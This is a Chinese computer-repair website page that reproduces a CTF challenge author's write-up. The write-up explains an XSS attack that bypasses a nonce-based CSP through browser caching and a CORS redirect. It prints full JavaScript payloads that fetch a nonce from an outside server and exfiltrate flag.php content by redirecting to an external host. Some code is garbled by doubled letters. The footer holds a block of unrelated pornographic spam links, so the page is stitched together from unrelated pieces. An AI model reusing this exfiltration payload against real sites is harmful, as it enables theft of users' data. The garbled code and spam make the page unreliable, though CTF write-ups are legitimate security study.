錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
pwnhub 絕對防御出題思路和反思

作者: 佚名  日期:2017-04-27 16:30:43   來源: 本站整理

 wnhub 絕對防御 出題思路和反思。由于整個站最初的時(shí)候其實(shí)是用來測試漏洞的,所以被改成題目的時(shí)候很多應(yīng)該注意的地方?jīng)]有仔細(xì)推敲,在看了別人wp后仔細(xì)研究了一下,我發(fā)現(xiàn)題目本身漏洞就要求admin和xss點(diǎn)在同源下,整個漏洞被改成ctf題目是存在沖突的,再加上flag所在的地方使用了referer check本身就有問題,導(dǎo)致題目有了很多非預(yù)期解法,深感抱歉。

下面就完整的整理一下wp和所有的非預(yù)期攻擊方式

\

初逛站里面什么都沒有,聊天版的地方存在基本的xss,復(fù)寫就能繞過,但有 簡單的csp,允許unsafa-inline,session是httponly的,復(fù)寫構(gòu)造xss讀admin頁面的消息(讓admin去請求api)

獲取頁面內(nèi)容后,得到了后面站的地址,打開看看返回是這樣的

Wow, good guys,maybe you want /adminshigesha233e3333/#admin

\

再看看flag.php

hello, hacker, only admin can see it

只有管理員才能看,這里如果在user.php構(gòu)造xss去讀flag的內(nèi)容的話,會得到我的提示

nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

這里的提示本來意思是只有在admin目錄下才能讀到flag.php的內(nèi)容,但是沒想到有一些人,在這里去日了我的判斷,而不是構(gòu)造別的xss。

事實(shí)證明referer check不可取,切記切記

這位大佬就是攻擊了我的referer check,藍(lán)貓也是類似的方式

https://pwnhub.cn/media/writeup/121/79edbf2c-75da-48bb-8f5d-563d0048849b_b8b69656.pdf

下面我們回歸到正確的攻擊思路上去。

我們發(fā)現(xiàn)index.php是存在xss的樣子,但是后臺開啟了csp

\

這是一個比較特別的nonce script csp,屬于新型的csp,每次請求服務(wù)器都會更換新的字符串,如果字符串不匹配,那么腳本就會被攔截。(后面我會再發(fā)文章講這個CSP的攻擊方式)

我不知道盲測這個漏洞是怎么測試的,但你可能需要一篇文章

xss.html" data-ke-src="http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html" target="_blank">http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html

文章中提到了一點(diǎn),如果瀏覽器并沒有請求后臺,那么csp就不會刷新,那么怎么才能讓它不刷新呢?瀏覽器緩存!

當(dāng)服務(wù)端做出一部分配置的之后,如果頁面內(nèi)容不涉及到后臺(僅涉及到前臺的變化),那么瀏覽器就會從緩存中加載內(nèi)容。

\

具體瀏覽器緩存的機(jī)制就不多解釋了,我們發(fā)現(xiàn)后臺開啟了緩存機(jī)制,雖然只有30s,但是已然足夠了。

這里其實(shí)思路就呼之欲出了,先iframe請求一次,然后解出nonce的值,添加到script的屬性中,執(zhí)行任意xss。

由于沒有同源策略的攔截,所以出現(xiàn)了很多問題,類似于wupco的payload,但小m的和cola的是正解。

https://pwnhub.cn/media/writeup/123/909db9f9-1bb4-4c5b-a697-b0fa223ed376_a599515c.pdf

下面貼出,跨域情況下的處理方式以及payload,也是我出題的初衷。

根據(jù)前面文章中的poc,我們重新梳理試圖讀取flag.php的流程。

1、向admin發(fā)送payload,admin頁面需要打開一個iframe目標(biāo)為后臺并輸入一個form,用textrea吃掉頁面內(nèi)容

IFrame

由于我們需要接收到這部分信息,而且后臺開啟csp,無法發(fā)送跨域請求,所以在自己服務(wù)器構(gòu)造nonce.php文件解析請求,返回nonce字符串。(nonce.php必須保證保存字符串,在之后的請求中返回,在原poc中,這里是通過session保留的,但是我在實(shí)際測試的時(shí)候遇到了問題,我改成了文件儲存)

2、我們需要不斷請求nonce.php,并點(diǎn)擊提交按鈕,當(dāng)返回有內(nèi)容的時(shí)候,開啟新的iframe標(biāo)簽,插入script標(biāo)簽,讀取flag.php,以跳轉(zhuǎn)的方式傳出。

functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/admin/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

{C}

由于xhr需要跨域請求nonce.php,而前臺的站中含有csp,這是一個預(yù)設(shè)的坑,細(xì)心的人不難發(fā)現(xiàn),用戶的信息是通過請求api/getmessage.php獲取的

\

我們可以注意這個頁面并沒有csp,所以構(gòu)造跳轉(zhuǎn)到getmessage.php,然后服務(wù)端設(shè)置 header("Access-Control-Allow-Origin:*"); ,成功繞過

全部payload如下

IFrame

if(locatioonn.pathname != "/api/getmessage.php"){ window.locatioonn.href = "http://" + document.domain + "/api/getmessage.php" } functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/adminshigesha233e3333/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

\

但事實(shí)上,題目有個非常有趣的非預(yù)期漏洞。

如果你注意觀察admin目錄的index.php頁面

\

xss點(diǎn)和script標(biāo)簽在同一行,所以就有了一個新的問題,如果我們構(gòu)造一個

<script>  標(biāo)簽,然后沒有閉合,就可以吃掉后面的標(biāo)簽,把后面script標(biāo)簽的屬性保留

最后貼下virink的wp

https://pwnhub.cn/media/writeup/119/45db4b4d-53dc-47de-afe8-e821bd070dfa_7032e508.pdf

這次的非預(yù)期問題實(shí)在抱歉,下次出題一定仔細(xì)思考下漏洞的流程和問題,還是太菜了Orz

 

</script>



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲AV无码成人精品区在线观看| 无码av中文一二三区| 日韩av无码中文字幕| 亚洲精品无码久久久久久| 精品少妇人妻av无码专区| 国产精品无码成人午夜电影 | 无码免费一区二区三区免费播放| 小SAO货水好多真紧H无码视频| 亚洲爆乳精品无码一区二区| 亚洲精品无码久久久久| 久久久国产精品无码一区二区三区 | 中文字幕久久久人妻无码 | 国产乱子伦精品无码码专区| 国产成人精品无码专区| 成人无码网WWW在线观看| 精品无码久久久久久久久久| 成年午夜无码av片在线观看| 亚洲性无码一区二区三区| 亚洲精品无码午夜福利中文字幕| 无码精品A∨在线观看无广告| 久久久久亚洲av无码尤物| 久久久久亚洲精品无码网址| 午夜寂寞视频无码专区| 中日韩精品无码一区二区三区| 午夜无码A级毛片免费视频| 日韩人妻无码一区二区三区综合部| 丰满爆乳无码一区二区三区| 亚洲中文无码亚洲人成影院| 日韩AV无码中文无码不卡电影| 国精品无码一区二区三区左线| 中文无码精品一区二区三区| AV无码小缝喷白浆在线观看| 国产AⅤ无码专区亚洲AV| 国产亚洲精久久久久久无码AV | 中文人妻无码一区二区三区| 亚洲精品无码99在线观看| 成人免费无码精品国产电影| 在线A级毛片无码免费真人 | 五月丁香六月综合缴清无码| 免费无码又爽又高潮视频| 国产成人无码免费视频97 |